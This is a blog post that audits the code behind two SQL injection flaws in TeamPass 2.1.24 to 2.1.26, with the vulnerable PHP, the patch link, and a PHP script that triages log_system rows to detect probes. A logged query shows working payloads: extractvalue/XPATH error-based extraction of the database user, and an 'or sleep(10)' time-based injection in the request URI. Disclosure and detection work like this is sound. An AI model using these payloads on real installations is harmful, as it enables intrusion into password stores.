Braid Information Security Blog - Web Security | Code Audit | Secure Development | Java | php | python

[PHP Code Audit] TeamPass SQL Injection Vulnerabilities (CVE requested)

0x01 Affected Versions

All TeamPass versions (2.1.26, 2.1.25, 2.1.24)

0x02 Description

On 11 July 2016, two SQL injection vulnerabilities affecting all TeamPass versions (2.1.26, 2.1.25, 2.1.24) were disclosed on seclists.org.

0x03 Details

TeamPass published a patch on GitHub:
https://github.com/nilsteampassnet/TeamPass/commit/7bf6c63c4727a6ba9d65610e59ccbc25527a6fca
Working from the patch, we can briefly analyse the two vulnerabilities:

Injection one:

Vulnerable code in sources/items.queries.php, lines 2504 to 2540:

case "send_email":
    if ($_POST['key'] != $_SESSION['key']) {
        echo '[{"error" : "something_wrong"}]';
        break;
    } else {
        if (!empty($_POST['content'])) {
            $content = explode(',', $_POST['content']);
        }
        // get links url
        if (empty($_SESSION['settings']['email_server_url'])) {
            $_SESSION['settings']['email_server_url'] = $_SESSION['settings']['cpassman_url'];
        }
        if ($_POST['cat'] == "request_access_to_author") {
            $dataAuthor = DB::queryfirstrow("SELECT email,login FROM " . prefix_table("users") . " WHERE id= " . $content[1]);
            $dataItem = DB::queryfirstrow("SELECT label FROM " . prefix_table("items") . " WHERE id= " . $content[0]);
            $ret = @sendEmail(
                $LANG['email_request_access_subject'],
                str_replace(array('#tp_item_author#', '#tp_user#', '#tp_item#'), array(" " . addslashes($dataAuthor['login']), addslashes($_SESSION['login']), addslashes($dataItem['label'])), $LANG['email_request_access_mail']),
                $dataAuthor['email']
            );
        } elseif ($_POST['cat'] == "share_this_item") {
            // $_POST['id'] is concatenated here without single-quote protection
            $dataItem = DB::queryfirstrow("SELECT label,id_tree FROM " . prefix_table("items") . " WHERE id= " . $_POST['id']);

            // send email
            $ret = @sendEmail(
                $LANG['email_share_item_subject'],
                str_replace(
                    array('#tp_link#', '#tp_user#', '#tp_item#'),
                    array($_SESSION['settings']['email_server_url'] . '/index.php?page=items&group=' . $dataItem['id_tree'] . '&id=' . $_POST['id'], addslashes($_SESSION['login']), addslashes($dataItem['label'])),
                    $LANG['email_share_item_mail']
                ),
                $_POST['receipt']
            );
        }
        echo '[{' . $ret . '}]';
    }
    break;

Looking at the vulnerable code above, the parameter $_POST['id'] is concatenated into the database query without single-quote protection and without any effective SQL injection filtering, which results in a SQL injection vulnerability.

Injection two:

Vulnerable code in includes/libraries/Database/Meekrodb/db.class.php, lines 609 to 621:

// ----- BEGIN ERROR HANDLING
if (!$sql || $db->error) {
    if ($this->error_handler) {
        $db_error = $db->error;
        $db_errno = $db->errno;
        $db->query(
            "INSERT INTO " . $GLOBALS['pre'] . "log_system SET
            date=" . time() . ",
            qui=" . $_SESSION['user_id'] . ",
            label='Query: " . addslashes($sql) . "<br />Error: " . addslashes($db_error) . "<br />@ " . $_SERVER['REQUEST_URI'] . "',
            type='error'",

            MYSQLI_USE_RESULT
        );

This INSERT statement runs whenever a database query fails, and the $_SERVER['REQUEST_URI'] value is concatenated into it without any SQL injection filtering. The tests below were run on PHP 5.5, which no longer has magic_quotes_gpc, so SQL injection is possible here as well.

0x04 Proof of Concept

Injection one:
Capturing the request with Burp Suite and using XPATH injection, the current database user and version can be retrieved as follows:

Injection two:
Building on injection one, adding a time delay triggers the second injection as follows:

Burp showed the response arriving only after a 10-second wait, and monitoring the MySQL log confirmed that the following INSERT statement had been executed:

INSERT INTO teampass_log_system SET
date=1468297513,
qui=1,
label='Query: SELECT label,id_tree FROM teampass_items WHERE id= -1/**/and/**/extractvalue(1,concat(0x7e,(select concat(user()))))#<br />Error: XPATH syntax error: \'~root@localhost\'<br />@ /teampass/sources/items.queries.php?'or/**/sleep(10)/**/or'1',
type='error'
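The log_system row above is also useful to defenders: every failed query, including the attacker's probe and the request URI that carried it, is written to the table. The following added example (not TeamPass code) parses the label column in the format the error handler writes ("Query: ...<br />Error: ...<br />@ ...") and flags rows that look like injection attempts. The sample rows are constructed for this demo and modelled on the entry shown above; the function names parseLogLabel, injectionIndicators and triageLogRows are assumptions.

```php
<?php
// Added example, not TeamPass code: triage rows of the log_system table that
// TeamPass's error handler writes. Sample rows are constructed for this demo.

const LABEL_PATTERN = '#^Query: (?<sql>.*?)<br />Error: (?<error>.*?)<br />@ (?<uri>.*)$#s';

// Split the stored label back into the failed SQL, the error text and the URI.
function parseLogLabel(string $label): ?array
{
    if (!preg_match(LABEL_PATTERN, $label, $m)) {
        return null;
    }
    return ['sql' => $m['sql'], 'error' => $m['error'], 'uri' => $m['uri']];
}

// Return the reasons a parsed entry looks like an injection probe (empty if none).
function injectionIndicators(array $entry): array
{
    $reasons = [];
    // An XPATH syntax error from an items query means a MySQL XML function was reached.
    if (stripos($entry['error'], 'XPATH syntax error') !== false) {
        $reasons[] = 'XPATH error-based extraction';
    }
    // The id is concatenated after "WHERE id=", so a boolean operator there is foreign.
    if (preg_match('#WHERE id=\s*-?\d+\s*(/\*\*/|\s)(and|or)\b#i', $entry['sql'])) {
        $reasons[] = 'boolean condition appended to id';
    }
    // The UI never sends quotes or delay functions in the request URI.
    if (preg_match('#[\'"]|\bsleep\s*\(|\bbenchmark\s*\(#i', $entry['uri'])) {
        $reasons[] = 'suspicious characters in REQUEST_URI';
    }
    return $reasons;
}

// Run the checks over rows fetched from log_system (date, qui, label).
function triageLogRows(array $rows): array
{
    $flagged = [];
    foreach ($rows as $row) {
        $entry = parseLogLabel($row['label']);
        if ($entry === null) {
            continue;
        }
        $reasons = injectionIndicators($entry);
        if ($reasons) {
            $flagged[] = [
                'date'    => $row['date'],
                'qui'     => $row['qui'],
                'uri'     => $entry['uri'],
                'reasons' => $reasons,
            ];
        }
    }
    return $flagged;
}

// Constructed sample rows: the first mirrors the entry shown on this page, the
// second is an ordinary backend error that should not be flagged.
$rows = [
    ['date' => 1468297513, 'qui' => 1, 'label' =>
        "Query: SELECT label,id_tree FROM teampass_items WHERE id= -1/**/and/**/extractvalue(1,concat(0x7e,(select concat(user()))))#"
        . "<br />Error: XPATH syntax error: '~root@localhost'"
        . "<br />@ /teampass/sources/items.queries.php?'or/**/sleep(10)/**/or'1"],
    ['date' => 1468297600, 'qui' => 2, 'label' =>
        "Query: SELECT label,id_tree FROM teampass_items WHERE id= 42"
        . "<br />Error: MySQL server has gone away"
        . "<br />@ /teampass/sources/items.queries.php"],
];

foreach (triageLogRows($rows) as $hit) {
    printf("%s user=%d uri=%s reasons=%s\n",
        date('c', $hit['date']), $hit['qui'], $hit['uri'], implode('; ', $hit['reasons']));
}
```

Only the first row is reported, with all three reasons. Because the error handler records the user id (qui) alongside the failed SQL, the same query can be used on the live table to attribute probes to the authenticated account that sent them, which is the natural starting point for an incident review after applying the patch.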

This article was compiled by HackBraid; original link: http://www.cnbraid.com/2016/teampass.html. Please contact the author before reprinting.